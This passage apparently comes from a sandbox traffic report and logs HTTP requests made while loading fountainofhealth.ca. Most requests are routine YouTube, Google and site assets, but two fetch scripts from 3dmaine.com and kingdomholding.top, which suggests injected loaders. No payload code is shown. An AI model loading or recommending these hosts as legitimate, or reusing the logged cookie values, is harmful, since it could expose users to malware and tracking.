  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  x-browser-channel: stable
  x-browser-year: 2025
  x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=
  x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: navigate
  sec-fetch-dest: iframe
  sec-fetch-storage-access: active
  referer: https://fountainofhealth.ca/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0, i

Source: global traffic HTTP traffic detected: GET /embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX HTTP/1.1
  host: www.youtube.com
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  upgrade-insecure-requests: 1
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  x-browser-channel: stable
  x-browser-year: 2025
  x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=
  x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: navigate
  sec-fetch-dest: iframe
  sec-fetch-storage-access: active
  referer: https://fountainofhealth.ca/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0, i

Source: global traffic HTTP traffic detected: GET /embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws HTTP/1.1
  host: www.youtube.com
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  upgrade-insecure-requests: 1
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  x-browser-channel: stable
  x-browser-year: 2025
  x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=
  x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: navigate
  sec-fetch-dest: iframe
  sec-fetch-storage-access: active
  referer: https://fountainofhealth.ca/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0, i

Source: global traffic HTTP traffic detected: GET /s/player/3b4b7883/www-player.css HTTP/1.1
  host: www.youtube.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  x-client-data: CLbgygE=
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: YSC=ReHAOhqWrU8
  cookie: __Secure-ROLLOUT_TOKEN=CN33uamwubWmXRD6lYjkvtONAxj6lYjkvtONAw%3D%3D
  cookie: VISITOR_INFO1_LIVE=f3ynVHy8dD0
  cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGg%3D%3D
  priority: u=0

Source: global traffic HTTP traffic detected: GET /s/player/3b4b7883/player_ias.vflset/en_US/embed.js HTTP/1.1
  host: www.youtube.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: script
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: YSC=-1fRDkvXcbo
  cookie: __Secure-ROLLOUT_TOKEN=CMOvz4P_4ZCdExCvy4jkvtONAxivy4jkvtONAw%3D%3D
  cookie: VISITOR_INFO1_LIVE=C_agYD195PA
  cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgOg%3D%3D
  priority: u=1

Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Info-Blue.png HTTP/1.1
  host: fountainofhealth.ca
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /s/player/3b4b7883/www-embed-player.vflset/www-embed-player.js HTTP/1.1
  host: www.youtube.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: script
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: YSC=-1fRDkvXcbo
  cookie: __Secure-ROLLOUT_TOKEN=CMOvz4P_4ZCdExCvy4jkvtONAxivy4jkvtONAw%3D%3D
  cookie: VISITOR_INFO1_LIVE=C_agYD195PA
  cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgOg%3D%3D
  priority: u=1

Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/sticky-header.module.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/container-inline.module.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /d.js HTTP/1.1
  host: 3dmaine.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  sec-fetch-site: cross-site
  sec-fetch-mode: no-cors
  sec-fetch-dest: script
  sec-fetch-storage-access: active
  referer: https://fountainofhealth.ca/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=2

Source: global traffic HTTP traffic detected: GET /s/player/3b4b7883/player_ias.vflset/en_US/base.js HTTP/1.1
  host: www.youtube.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: script
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: YSC=-1fRDkvXcbo
  cookie: __Secure-ROLLOUT_TOKEN=CMOvz4P_4ZCdExCvy4jkvtONAxivy4jkvtONAw%3D%3D
  cookie: VISITOR_INFO1_LIVE=C_agYD195PA
  cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgOg%3D%3D
  priority: u=1

Source: global traffic HTTP traffic detected: GET /s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2 HTTP/1.1
  host: fonts.gstatic.com
  origin: https://www.youtube.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: font
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=4

Source: global traffic HTTP traffic detected: GET /s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2 HTTP/1.1
  host: fonts.gstatic.com
  origin: https://www.youtube.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: font
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=4

Source: global traffic HTTP traffic detected: GET /s/player/3b4b7883/player_ias.vflset/en_US/remote.js HTTP/1.1
  host: www.youtube.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: script
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: YSC=VZrzuY-qz_o
  cookie: __Secure-ROLLOUT_TOKEN=COa79u7kuMTQQBDQs4nkvtONAxjQs4nkvtONAw%3D%3D
  cookie: VISITOR_INFO1_LIVE=qKGaFNOnpe0
  cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgEA%3D%3D

Source: global traffic HTTP traffic detected: GET /ss/fon.js HTTP/1.1
  Host: kingdomholding.top
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: script
  Sec-Fetch-Storage-Access: active
  Referer: https://fountainofhealth.ca/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic HTTP traffic detected: GET /vi_webp/gobWGqPjLSQ/hqdefault.webp HTTP/1.1
  host: i.ytimg.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: no-cors
  sec-fetch-dest: image
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /vi/FURi5aHgp1g/sddefault.jpg?sqp=-oaymwEmCIAFEOAD8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCTwafuki5vRADsDtfgeiF3qyS0Ew HTTP/1.1
  host: i.ytimg.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: no-cors
  sec-fetch-dest: image
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/sddefault.webp HTTP/1.1
  host: i.ytimg.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: no-cors
  sec-fetch-dest: image
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /instream/ad_status.js HTTP/1.1
  host: static.doubleclick.net
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: no-cors
  sec-fetch-dest: script
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9

Source: global traffic HTTP traffic detected: GET /pagead/id HTTP/1.1
  host: googleads.g.doubleclick.net
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  origin: https://www.youtube.com
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/js.module.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/details.module.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/position-container.module.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/progress.module.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/fonts/glyphicons-halflings-regular.woff2 HTTP/1.1
  host: cdn.jsdelivr.net
  origin: https://fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: font
  referer: https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/css/bootstrap.css
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=4

Source: global traffic HTTP traffic detected: GET /js/th/qGrsDjDjXxcnxnpvJpNLwNqYSxdC2jzwhgPLO7suYzE.js HTTP/1.1
  host: www.google.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: no-cors
  sec-fetch-dest: script
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9

Source: global traffic HTTP traffic detected: GET /pagead/id HTTP/1.1
  host: googleads.g.doubleclick.net
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  origin: https://www.youtube.com
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1
  host: googleads.g.doubleclick.net
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  origin: https://www.youtube.com
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /generate_204?UUowYQ HTTP/1.1
  host: www.youtube.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  x-client-data: CLbgygE=
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: image
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: YSC=VZrzuY-qz_o
  cookie: __Secure-ROLLOUT_TOKEN=COa79u7kuMTQQBDQs4nkvtONAxjQs4nkvtONAw%3D%3D
  cookie: VISITOR_INFO1_LIVE=qKGaFNOnpe0
  cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgEA%3D%3D
  priority: i

Source: global traffic HTTP traffic detected: GET /pagead/id HTTP/1.1
  host: googleads.g.doubleclick.net
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  origin: https://www.youtube.com
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /vi_webp/gobWGqPjLSQ/hqdefault.webp HTTP/1.1
  host: i.ytimg.com
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-rj HTTP/1.1
  host: yt3.ggpht.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: no-cors
  sec-fetch-dest: image
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /generate_204?--7krg HTTP/1.1
  host: www.youtube.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  x-client-data: CLbgygE=
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: image
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: YSC=VZrzuY-qz_o
  cookie: __Secure-ROLLOUT_TOKEN=COa79u7kuMTQQBDQs4nkvtONAxjQs4nkvtONAw%3D%3D
  cookie: VISITOR_INFO1_LIVE=qKGaFNOnpe0
  cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgEA%3D%3D
  priority: i

Source: global traffic HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/sddefault.webp HTTP/1.1
  host: i.ytimg.com
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /vi/FURi5aHgp1g/sddefault.jpg?sqp=-oaymwEmCIAFEOAD8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCTwafuki5vRADsDtfgeiF3qyS0Ew HTTP/1.1
  host: i.ytimg.com
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /generate_204?6bdlyg HTTP/1.1
  host: www.youtube.com
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  x-client-data: CLbgygE=
